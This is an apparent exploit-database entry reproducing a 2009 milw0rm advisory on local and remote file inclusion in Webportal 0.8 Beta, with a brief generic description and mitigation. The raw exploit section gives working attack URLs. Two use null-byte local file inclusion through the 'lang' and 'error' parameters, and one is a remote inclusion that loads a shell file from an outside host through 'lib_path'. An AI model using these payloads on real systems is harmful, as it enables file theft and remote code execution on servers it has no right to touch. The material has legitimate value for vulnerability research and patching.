Webportal 0.8 Beta Local File Inclusion Vulnerability

vendor:

Webportal 0.8 Beta

by:

Ahmadbady

9,3

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Webportal 0.8 Beta

Affected Version From: 0.8 Beta

Affected Version To: 0.8 Beta

Patch Exists: NO

Related CWE: N/A

CPE: a:webportal:webportal:0.8_beta

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2009

Webportal 0.8 Beta Local File Inclusion Vulnerability

Webportal 0.8 Beta is vulnerable to Local File Inclusion (LFI) vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The attacker can include a malicious file from the local system or from a remote system. This vulnerability can be exploited to gain access to sensitive information, execute arbitrary code, and perform other malicious activities.

Mitigation:

The application should be configured to only allow access to files that are necessary for the application to function. The application should also be configured to deny access to files that are not necessary for the application to function.

Source

Exploit-DB raw data:

                              (  ' )-.          ,~'`-.
                                       ,~' `  ' ) )       _(   _) )
                                      ( ( .--.===.--.    (  `    ' )
                                       `.%%.      .#`.   `-'`~~=~'
                                       /%%/         \##\
                                      |%%/  multi    \##|
                                      |%%|           |##|.,-.
                                      \%%|  file     |##/    )_
                                       \%\           /#/ ( `'  )
                                        \%\ include /#/(  ,  -'`-.
                                    ,~-. `%\       /#'(  (     ') )
                                   (  ) )_ `\__|__/'   `~-~=--~~='
                                  ( ` ')  ) [-=-=-]
                                 (_(_.~~~'   \|_|/ 
                                             [***]
                              \|||/
                              (o o) 
-=-=-=-==-=-=-=-=-=-=-=+-oooO--(_)-------+-=-=-=-=-=-=-   
                       |                 |    
                       |                 |                                      

script:webportal-0.8-beta
-------------------------------------------------
Author: ahmadbady 
email: kivi_hacker666@yahoo.com
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-====-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=--
download from:https://sites.google.com/site/ivanoculmine/Home/webportal-0.8-beta.zip?attredirects=0

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=--=-=--===-=--=-=-=
xpl:

http://127.0.0.1/path/webportal-0.8-beta/libraries/helpdocs/help.php?lang=[local file]%00

http://127.0.0.1/path/webportal-0.8-beta/indexk.php?lib_path=http://site.com/shell.txt?

http://127.0.0.1/path/webportal-0.8-beta/index.php?error=[local file]%00
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-


-=-=-=-=-=-=-=-=-=-=-=-+------------Ooo--+-=-=-=-=-=-=-=-=-=-=-          
                            |__|__|
                             || ||
                             OoO OoO

# milw0rm.com [2009-04-22]